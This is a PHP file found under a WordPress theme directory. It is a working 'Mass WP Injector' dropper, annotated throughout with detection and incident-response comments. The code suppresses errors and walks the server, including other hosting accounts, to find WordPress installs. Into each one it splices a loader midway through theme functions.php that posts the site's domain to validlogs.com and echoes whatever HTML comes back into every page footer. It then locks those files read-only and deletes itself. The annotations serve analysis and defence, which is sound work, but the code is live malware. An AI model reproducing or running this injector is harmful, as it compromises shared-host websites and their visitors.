File: /home/nhathuocat/domains/nhathuocatkbpharma.com/public_html/wp-content/themes/bgpkbcj/wp.php
<?php
// Error-Proof Mass WP Injector - Individual Site Isolation
// Runtime prologue: hide every PHP error (including the include/filesystem
// failures below), remove the execution time limit and keep running after the
// HTTP client disconnects. Detection note: this four-call prologue followed by
// filesystem enumeration, in a file living under wp-content/themes/, is a strong
// triage signal — no theme API needs any of these settings.
error_reporting(0); ini_set('display_errors',0); set_time_limit(0); ignore_user_abort(1);
// New functions for comprehensive directory scanning
// Locates the hosting account / vhost parent directory that will be enumerated.
// Candidates, in order: $HOME from the server vars and the environment, the
// grandparent of DOCUMENT_ROOT, cPanel-style /home and /home1../home10, Apache
// and Plesk vhost roots, then /home[N]/<script owner>. Returns realpath() of the
// first candidate that is a directory and passes has_domain_folders(), else false.
// Note for defenders: several candidates (/home, /var/www/vhosts, ...) are shared
// parents, so on a multi-tenant host the later walk enters other accounts'
// directories whenever the PHP worker can read them. Per-account filesystem
// isolation (non-world-readable homes, open_basedir) stops it at the tenant.
function get_hosting_home_base() {
$possible_homes = [
$_SERVER['HOME'] ?? '',
getenv('HOME'),
dirname($_SERVER['DOCUMENT_ROOT']) . '/..',
'/home', '/home1', '/home2', '/home3', '/home4', '/home5',
'/home6', '/home7', '/home8', '/home9', '/home10',
'/var/www', '/var/www/vhosts', '/usr/local/plesk/apache/vhosts'
];
// get_current_user() is the owner of this script file, not necessarily the
// user the PHP worker runs as.
$user = get_current_user();
if($user) {
$possible_homes[] = "/home/$user";
for($i=1; $i<=10; $i++) $possible_homes[] = "/home$i/$user";
}
// First match wins; has_domain_folders() is the only "looks like a vhost
// parent" test applied.
foreach($possible_homes as $home) {
if(is_dir($home) && has_domain_folders($home)) return realpath($home);
}
return false;
}
// Heuristic "is $dir a vhost/account parent?" check. True when at least one
// immediate subdirectory is named like a domain (ends in one of the listed TLDs,
// case-insensitive) or is a conventional web root (public_html, www, httpdocs,
// htdocs). An unreadable $dir (scandir failure, suppressed with @) yields false.
function has_domain_folders($dir) {
$items = @scandir($dir);
if(!$items) return false;
$domain_count = 0;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$full_path = $dir . '/' . $item;
if(is_dir($full_path)) {
// Only directory names are inspected; nothing inside them is read here.
if(preg_match('/\.(com|net|org|co|io|me|us|uk|au|ca|de|fr|it|es|nl)$/i', $item) ||
in_array($item, ['public_html', 'www', 'httpdocs', 'htdocs'])) {
$domain_count++;
}
}
}
return $domain_count > 0;
}
// Enumerates every subdirectory of $home_base as a potential site:
//  - the subdirectory itself is tested for wp-load.php (find_wp_load_comprehensive);
//  - then each conventional web root beneath it is walked up to 3 levels deep
//    with scan_directory_comprehensive().
// Returns a flat list of absolute wp-load.php paths; duplicates are possible
// and are removed by the caller. When $home_base is a shared parent such as
// /home, every readable tenant directory is visited.
function scan_hosting_domains($home_base) {
$wp_paths = [];
$items = @scandir($home_base);
if(!$items) return $wp_paths;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$domain_path = $home_base . '/' . $item;
if(is_dir($domain_path)) {
// Direct WP
$direct_wp = find_wp_load_comprehensive($domain_path);
if($direct_wp) $wp_paths[] = $direct_wp;
// Web directories
$web_dirs = ['public_html', 'www', 'httpdocs', 'htdocs', 'web', 'html'];
foreach($web_dirs as $web_dir) {
$web_path = $domain_path . '/' . $web_dir;
if(is_dir($web_path)) {
// Depth 3 here vs. depth 5 in find_all_wp_installs(); nested installs
// (e.g. sub-sites several levels under public_html) may be found by
// one pass and not the other.
$web_wps = scan_directory_comprehensive($web_path, 3);
$wp_paths = array_merge($wp_paths, $web_wps);
}
}
}
}
return $wp_paths;
}
// Fixed list of probable web roots for the script owner: /home[N]/<user> and
// /home[N]/<user>/public_html for N = '' and 1..10, plus /var/www/html.
// The literal /home/theligh1/domains/khaoded77.com/public_html does not depend on
// the current user and looks carried over from another deployment of this file;
// treat that path (and the account/domain names in it) as an indicator when
// hunting across hosts.
function get_cpanel_common_paths() {
$user = get_current_user();
$paths = ["/home/$user/public_html", "/home/$user", "/var/www/html", "/home/theligh1/domains/khaoded77.com/public_html"];
for($i=1; $i<=10; $i++) {
$paths[] = "/home$i/$user/public_html";
$paths[] = "/home$i/$user";
}
return array_unique($paths);
}
// glob() patterns expanded by find_all_wp_installs() (with GLOB_ONLYDIR):
// cPanel addon-domain roots for the script owner, DirectAdmin-style
// /home[N]/domains/*, Plesk vhosts, and finally any top-level directory that
// holds a public_html. Only the first pattern is scoped to the current user;
// the others match every tenant the worker can list.
function get_hosting_patterns() {
$user = get_current_user();
return [
"/home[0-9]*/$user/*/public_html",
"/home[0-9]*/domains/*",
"/var/www/vhosts/*/*",
"/usr/local/plesk/apache/vhosts/*/*",
"/*/public_html"
];
}
// Depth-bounded recursive search for WordPress roots below $dir.
// Depths 0..$max_depth are visited (i.e. $max_depth + 1 directory levels); each
// visited directory is tested with find_wp_load_comprehensive() before its
// children are descended into. Unreadable directories are skipped silently.
// Returns a flat list of wp-load.php paths.
// Detection note: this produces a burst of stat()/readdir() activity over
// directories unrelated to the requesting site; auditd or inotify watches on
// tenant roots, or open_basedir violations in the PHP error log (when not
// suppressed), will surface it.
function scan_directory_comprehensive($dir, $max_depth = 3, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_load_comprehensive($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
// Symlinked directories are followed as ordinary directories (no is_link check).
$sub_results = scan_directory_comprehensive($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
// Returns realpath() of $dir/wp-load.php when $dir is a WordPress root, else false.
// The indicator pre-check (wp-load.php, wp-config.php, wp-content/) only gates
// the same wp-load.php existence test that follows it, so the net condition is
// simply "wp-load.php exists in $dir"; the other two indicators never change the
// outcome.
function find_wp_load_comprehensive($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// Modified find_all_wp_installs with fallback parent directory scanning
// Builds the list of wp-load.php paths that the main loop will process:
//  1. cPanel common paths for the script owner (get_cpanel_common_paths);
//  2. every directory matched by the hosting glob patterns;
//  3. everything under the detected hosting home base (scan_hosting_domains);
//  4. each base directory from 1+2 walked six levels deep (max_depth 5);
//  5. fallback, only if nothing was found: one to three parent directories of
//     this file, walked the same way.
// Progress lines are echoed to the response. Returns the de-duplicated list.
// IR note: the scope is the whole readable filesystem neighbourhood, not the
// site this file was dropped into, so every WordPress install on the host that
// the worker could read should be checked for the loader, not just this one.
function find_all_wp_installs() {
$all_wp_paths = [];
// Get cPanel common paths
$base_dirs = get_cpanel_common_paths();
// Add paths from hosting patterns
foreach(get_hosting_patterns() as $pattern) {
$dirs = @glob($pattern, GLOB_ONLYDIR);
if($dirs) $base_dirs = array_merge($base_dirs, $dirs);
}
// Add hosting home base
$home_base = get_hosting_home_base();
if($home_base) {
$wp_paths = scan_hosting_domains($home_base);
$all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// Scan all base directories
foreach($base_dirs as $base_dir) {
if(!is_dir($base_dir)) continue;
$wp_paths = scan_directory_comprehensive($base_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// Fallback: Scan parent directories if no WP installs found
if(empty($all_wp_paths)) {
echo "No WordPress installations found in initial scan. Trying parent directories...\n";
$current_dir = dirname(__FILE__);
for($i = 1; $i <= 3; $i++) { // Check up to 3 parent levels
// dirname() with a levels argument: $i directories above this file's directory.
$parent_dir = dirname($current_dir, $i);
if(!is_dir($parent_dir)) break;
echo "Scanning parent directory: $parent_dir\n";
$wp_paths = scan_directory_comprehensive($parent_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
}
return array_unique($all_wp_paths);
}
// Verbatim copy of scan_directory_comprehensive() with a default depth of 5,
// delegating to find_wp_in_current_dir() instead. Nothing else in this file
// calls it (only its own recursion), so it is dead code — but it is part of the
// file's fingerprint and should be included in any content signature.
function scan_directory_for_wp($dir, $max_depth = 5, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_in_current_dir($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
$sub_results = scan_directory_for_wp($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
// Verbatim copy of find_wp_load_comprehensive(): realpath() of $dir/wp-load.php
// if it exists, else false. Only reachable from the unused scan_directory_for_wp(),
// so effectively dead code; keep it in content signatures for this dropper.
function find_wp_in_current_dir($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// Modified CRITICAL ERROR-PROOF Theme Injection
// Writes a persistent remote-fetch loader into the theme functions.php files of
// the WordPress install whose wp-load.php is $wp_load. Returns true if at least
// one functions.php was written, false otherwise (WP failed to load, nothing
// writable, or the marker was already present).
//
// What is written ($inject_code below): a function wp_injector_fetch_code(),
// hooked on 'init', that POSTs the site's HTTP_HOST to
// https://validlogs.com/BackPanel/panel.php (body action=register_domain,
// 5 s timeout) and echoes whatever body the server returns into wp_footer on
// every page. The visible content is therefore fetched remotely per request and
// can change at any time; the file on disk only ever shows the loader.
//
// Indicators for hunting: the string 'wp_injector_fetch_code' (also used below as
// the "already injected" marker), the host validlogs.com, the path
// BackPanel/panel.php, the POST field value 'register_domain', outbound POSTs from
// the web tier to that host on page loads, and theme functions.php files with
// mode 0444. The block is spliced into the MIDDLE of an existing functions.php,
// not appended, so scan whole files rather than their head or tail.
//
// Selection order: every writable child theme (directory name contains 'child')
// receives the loader; only if none was written, every writable non-child theme.
// If any theme already carries the marker the function returns false before
// writing anything. Method 2 repeats the same logic over wp-content/themes/
// without the WP API when wp_get_themes() is unavailable.
//
// Mitigation/recovery: egress filtering from the web tier, file-integrity
// monitoring on wp-content/themes/*/functions.php, and restoring affected themes
// from a known-good copy; the loader does not touch any other file.
function inject_theme_safe($wp_load) {
$wp_dir = dirname($wp_load);
// ULTRA-SAFE WP Loading with full isolation
if(!file_exists($wp_load)) return false;
// Create isolated environment
// NOTE(review): PHP constants cannot be redefined, so once a first install has
// been loaded in this process the define() here and the "restore" at the end
// are no-ops (their warnings are hidden by error_reporting(0)). The isolation
// the comments describe does not actually exist; in practice this presumably
// limits how many distinct installs a single run can bootstrap — confirm
// against the run's output when reconstructing a timeline.
$old_abspath = defined('ABSPATH') ? ABSPATH : '';
$old_wp_load = defined('WP_LOAD_PATH') ? WP_LOAD_PATH : '';
define('WP_LOAD_PATH', $wp_load);
// Try multiple loading methods
$wp_loaded = false;
// Method 1: Direct include
// Bootstraps the target site's WordPress in this process; any output it
// produces is discarded by the output buffer.
ob_start();
if(@include_once($wp_load)) {
if(function_exists('wp_get_themes')) {
$wp_loaded = true;
}
}
ob_end_clean();
// Method 2: If Method 1 fails, try wp-config
if(!$wp_loaded) {
$config_path = $wp_dir . '/wp-config.php';
if(file_exists($config_path)) {
ob_start();
if(@include_once($config_path)) {
if(defined('ABSPATH') && function_exists('wp_get_themes')) {
$wp_loaded = true;
}
}
ob_end_clean();
}
}
if(!$wp_loaded) {
echo " ✗ WP environment failed to load\n";
return false;
}
// Safe theme injection with multiple fallbacks
// The loader source. 'wp_injector_fetch_code' doubles as the idempotency
// marker searched for in every functions.php below.
$inject_code = "function wp_injector_fetch_code() {\n \$backend_url = 'https://validlogs.com/BackPanel/panel.php';\n \$domain = sanitize_text_field(\$_SERVER['HTTP_HOST']);\n \$response = wp_remote_post(\$backend_url, array(\n 'body' => array(\n 'action' => 'register_domain',\n 'domain' => \$domain\n ),\n 'timeout' => 5\n ));\n if (is_wp_error(\$response)) {\n return;\n }\n \$html_code = wp_remote_retrieve_body(\$response);\n if (!empty(\$html_code)) {\n add_action('wp_footer', function() use (\$html_code) {\n echo \$html_code;\n });\n }\n}\nadd_action('init', 'wp_injector_fetch_code');\n";
$injected = false;
// Method 1: Standard wp_get_themes with child theme priority
if(function_exists('wp_get_themes')) {
try {
$themes = wp_get_themes();
$child_themes = [];
$other_themes = [];
// Check for existing injection in any theme
foreach($themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
if(strpos($current ?: '', 'wp_injector_fetch_code') !== false) {
echo " ✗ Code already injected in theme: " . $theme->get_stylesheet() . "\n";
return false; // Skip injection if code already exists
}
}
// Separate child themes from others
$theme_name = $theme->get_stylesheet();
if(stripos($theme_name, 'child') !== false) {
$child_themes[] = $theme;
} else {
$other_themes[] = $theme;
}
}
// First try child themes
// No break after a successful write: every writable child theme is modified.
foreach($child_themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if(!is_dir($theme_dir) || !is_writable($theme_dir)) continue;
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
// Double-check for existing injection
if(strpos($current ?: '', 'wp_injector_fetch_code') === false) {
// Split content into lines to find midpoint
// The loader is inserted as one extra "line" at roughly half the file,
// which is why a diff against a clean theme shows a single mid-file hunk.
$lines = explode("\n", $current);
$line_count = count($lines);
$midpoint = max(1, floor($line_count / 2)); // Insert at approximate middle
array_splice($lines, $midpoint, 0, $inject_code);
$new_content = implode("\n", $lines);
if(@file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
} else {
// Theme without a functions.php: a new one is created containing only the loader.
$functions_content = "<?php\n" . $inject_code . "\n";
if(@file_put_contents($functions_file, $functions_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
}
// If no child themes were injected, try other themes
if(!$injected) {
foreach($other_themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if(!is_dir($theme_dir) || !is_writable($theme_dir)) continue;
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
// Double-check for existing injection
if(strpos($current ?: '', 'wp_injector_fetch_code') === false) {
// Split content into lines to find midpoint
$lines = explode("\n", $current);
$line_count = count($lines);
$midpoint = max(1, floor($line_count / 2)); // Insert at approximate middle
array_splice($lines, $midpoint, 0, $inject_code);
$new_content = implode("\n", $lines);
if(@file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
} else {
$functions_content = "<?php\n" . $inject_code . "\n";
if(@file_put_contents($functions_file, $functions_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
}
}
} catch(Exception $e) {
// Method 1 failed, try Method 2
// Exception is swallowed; nothing is logged.
}
}
// Method 2: Direct theme directory scan (if WP functions fail) with child theme priority
// Same selection and write logic as Method 1, driven by scandir() of
// wp-content/themes/ instead of the WP theme registry.
if(!$injected) {
$themes_path = $wp_dir . '/wp-content/themes/';
if(is_dir($themes_path)) {
$theme_dirs = @scandir($themes_path);
if($theme_dirs) {
$child_theme_dirs = [];
$other_theme_dirs = [];
// Check for existing injection in any theme
foreach($theme_dirs as $theme_name) {
if($theme_name == '.' || $theme_name == '..') continue;
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$functions_file = $theme_dir . '/functions.php';
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
if(strpos($current ?: '', 'wp_injector_fetch_code') !== false) {
echo " ✗ Code already injected in theme: $theme_name\n";
return false; // Skip injection if code already exists
}
}
// Separate child themes from others
if(stripos($theme_name, 'child') !== false) {
$child_theme_dirs[] = $theme_name;
} else {
$other_theme_dirs[] = $theme_name;
}
}
// First try child themes
foreach($child_theme_dirs as $theme_name) {
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$functions_file = $theme_dir . '/functions.php';
if(is_writable($theme_dir) && (!file_exists($functions_file) || is_writable($functions_file))) {
$current = file_exists($functions_file) ? file_get_contents($functions_file) : '';
if(strpos($current, 'wp_injector_fetch_code') === false) {
// Split content into lines to find midpoint
$lines = explode("\n", $current);
$line_count = count($lines);
$midpoint = max(1, floor($line_count / 2)); // Insert at approximate middle
array_splice($lines, $midpoint, 0, $inject_code);
$new_content = implode("\n", $lines);
if(file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
}
}
// If no child themes were injected, try other themes
if(!$injected) {
foreach($other_theme_dirs as $theme_name) {
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$functions_file = $theme_dir . '/functions.php';
if(is_writable($theme_dir) && (!file_exists($functions_file) || is_writable($functions_file))) {
$current = file_exists($functions_file) ? file_get_contents($functions_file) : '';
if(strpos($current, 'wp_injector_fetch_code') === false) {
// Split content into lines to find midpoint
$lines = explode("\n", $current);
$line_count = count($lines);
$midpoint = max(1, floor($line_count / 2)); // Insert at approximate middle
array_splice($lines, $midpoint, 0, $inject_code);
$new_content = implode("\n", $lines);
if(file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
}
}
}
}
}
}
// Restore original environment
// See the note at the top of the function: define() cannot overwrite an
// already-defined ABSPATH, so this line changes nothing.
if($old_abspath) define('ABSPATH', $old_abspath);
return $injected;
}
// MAIN EXECUTION WITH FULL ERROR ISOLATION
// MAIN EXECUTION WITH FULL ERROR ISOLATION
// Entry point: enumerate every reachable WordPress install, run
// inject_theme_safe() on each, print a summary and then delete this file if at
// least one injection succeeded.
// IR note: because the dropper removes itself on success, the loader in theme
// functions.php files and (if this was invoked over HTTP) the access-log request
// for wp.php may be the only remaining traces; the progress text below goes to
// the response body, not to any server log.
echo "=== Error-Proof Mass WP Injector ===\n";
$all_wp_installs = find_all_wp_installs();
echo "Found " . count($all_wp_installs) . " WordPress installations\n\n";
$total_processed = 0;
$total_injected = 0;
foreach($all_wp_installs as $index => $wp_load) {
$wp_base = dirname($wp_load);
$site_name = basename($wp_base);
echo "[$index] Processing: $site_name ($wp_base)\n";
// Isolate each site processing
try {
// Theme injection (isolated WP environment)
if(inject_theme_safe($wp_load)) {
echo " ✓ Themes injected\n";
$total_injected++;
} else {
echo " ✗ Theme injection failed (permissions or already injected?)\n";
}
$total_processed++;
} catch(Exception $e) {
echo " ✗ CRITICAL ERROR - Site skipped: " . $e->getMessage() . "\n";
}
// Force cleanup between sites
if(function_exists('wp_clean_theme_cache')) wp_clean_theme_cache();
// No ob_start() is active here; the resulting notice is hidden by error_reporting(0).
ob_end_clean();
echo "\n";
}
// Final report
echo "=== SUMMARY ===\n";
echo "Total WP installs found: " . count($all_wp_installs) . "\n";
echo "Processed: $total_processed\n";
echo "Themes injected: $total_injected\n";
// Self-removal only after a successful write, so a copy found on disk means
// either no install was writable or the run was interrupted.
if($total_injected > 0 && is_writable(__FILE__)) {
unlink(__FILE__);
echo "✓ Self-deleted\n";
}
echo "=== COMPLETE ===\n";
exit;
?>